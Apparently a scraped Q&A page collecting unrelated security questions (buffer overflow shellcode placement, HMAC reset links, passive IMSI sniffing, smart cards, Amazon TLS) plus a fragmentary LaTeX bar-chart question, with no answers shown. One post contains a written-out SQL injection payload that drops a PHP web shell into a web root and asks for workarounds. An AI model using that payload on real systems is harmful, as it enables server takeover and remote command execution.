Why do we have to put the shellcode before the return address in the buffer overflow?

I’d like to know why we have to put the shellcode before the return address in a buffer overflow. Logically the return address will point to the shellcode and will be executed, so the return address should be put before the shellcode. Can someone explain me?

HMAC password reset link and replay attacks

I like the look of this technique for sending password reset links:


(TLDR: don’t store token in database. Send password reset link w email address, expiry time, and corresponding hmac)

especially after reading about the Mozilla / Bugzilla reset bug.

It seems like it’s vulnerable to replay attacks though.

Q1: Under what circumstances is it vulnerable, assuming good HTTPS?

I think someone monitoring my network traffic (at say a wifi hotspot) would not be able to simply replay the GET request to the link, correct?

Q2: If it’s only a replay attack if an attacker has access to my email or physical access to my computer, isn’t token-based password reset equally vulnerable, as the attacker could simply request a new link?

Zero Knowledge Proof Password Systems

I am wondering if there is a practical zero-knowledge proof system that can be used by humans to authenticate themselves to a server. Note that even the computer can not be trusted (at least with the authentication), the prover part of the protocol has to be completely in the user’s brain.

How does Google or any other social media sites know what password I've used previously?

When I ask to change my password, Google sometimes doesn’t allow identical passwords to ones that I’ve used before. Is there a reason why this happens?

Cellular Mobile ID number Sniffing

As far as I know, cell phones intermittently transmit a Mobile ID number to inform surrounding cell towers that the phone is available. Is this transmission encrypted, or would one be able to passively monitor phone IDs in an area. Also, is this transmission static over time? Does it contain phone number data? I couldn’t find conclusive answers through google. Any extra info or explanation regarding communication between cell phones and towers or encoding schemes, etc would be appreciated.



After looking around this is how I think GSM networks works:
1) Phone broadcasts IMSI (not encrypted)
2) Tower responds with crypto challenge
3) Phone replies.
4) If reply passes, tower gives phone a temporary IMSI to use and communicates with that phone as long as it is the strongest tower in proximity.

As far as I know the tower tells the phone what encryption to use, so the initial broadcast of the IMSI should be readable. The issue is 99% of the time the phone will be using a temporary IMSI the tower gave it so. Is this correct? Is there any way one could tell the difference between a unique IMSI or a temp one that has been provided by the network.

My question is quite general in nature. All I really want to know if there is any way to passively gather unique phone signatures of any kind on a standard 3G network, preferably static signatures that wont change over days or months. Everything I’ve seen related to this is based on illegal man in the middle attacks.

Why does the SQL Injection technique INTO OUTFILE sometimes not work? [closed]

Why does the SQL Injection technique INTO OUTFILE sometimes not work?

http://example.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"

Is there any workaround for this when it doesn’t?

Hiding both public and private keys for private communication between 2 servers

I’ve been trying to learn about deeper info security past abstract words like “tunnels” and “networks”, and would appreciate some enlightenment on the following scenario:

2 servers are set up to communicate with each other via port X, using 2-way public key authentication as normal. Both servers have a static IP address and have set their firewall rules to only accept packets from the other’s IP address. The public key and encryption algorithm of each server is inherently known by the other, and not shared in the communication. Thus the only vulnerable information that is communicated between the servers is an encrypted message of undisclosed public key and undisclosed algorithm.

This is more secure than public communication from the get-go because of the single-IP firewall rule, but I am wondering how much more secure this setup is in general, and where I can read further on this topic. Thanks.

Update Hiding the public key does not affect the strength of brute force attacks because they simply guess keys in succession against the encrypted message, using the known cipher. However, if the cipher was privately held as well, I am assuming that brute force attackers would have difficulty figuring out which algorithm to guess keys on.

How do I find a PKI smart card reader/writer for development (Microsoft .NET)

I would like to learn how to develop software leveraging PKI smart cards. Ideally, I would use Microsoft Base Smart Card CSP, but I really just need the ability to store symmetric and asymmetric keys on the card securely, and to perform the associated functions, no matter the software requirements. I need the ability to write keys, and to encrypt/decrypt/sign/verify on the card. This should mean a writer, a card, and an SDK. It would be nice if the cards support ECC secp256k1, ECDSA, RSA 4096, AES, SHA256, etc… but I need to start somewhere.

I have following questions regarding smart card security:

  1. Are smart card readers typically also capable of writing to the
    card, or performing whatever administrative functions supported by
    the card? Or do I need a specific interface (software or hardware) for writing to a smart card.
  2. Do I need to be looking specifically for a cryptographic smart
    card, or do all cards support some cryptographic functions?
  3. It appears that there are differing contact patterns on different cards. Are there any competing standards for smart card security? I found ISO 7816, but no others.

Why is Amazon's home page not encrypted? [closed]

I’ve been working on my very first web application and I usually refer to Amazon.com as my role model.

I’m very interested in deploying my web application with SSL/TLS. However, there is one thing that I can’t understand. Why isn’t Amazon’s home page address bar colored green? Shouldn’t it be encrypted with SSL/TLS to secure the site?

Would it be enough to secure only the payment pages?

pgfplots: Bar graph with confidence intervals (error)

I would like to put a confidence interval (error bars) in my bar graph, but I tried the += and -= and it did not work.

Here is the code:

    width  = 0.50*textwidth,
    height = 8cm,
    major x tick style = transparent,
    bar width=25pt,
    ymajorgrids = true,
    symbolic x coords={A,B},
    xtick = data,
    scaled y ticks = false,
    enlarge x limits=0.50,
    legend cell align=left,
    legend style={at={(0.5,-0.12)},anchor=north}
        coordinates {
        (A, 2.98)

         coordinates {

    legend{Red Graph, Blue Graph}
Question and Answer is proudly powered by WordPress.
Theme "The Fundamentals of Graphic Design" by Arjuna
Icons by FamFamFam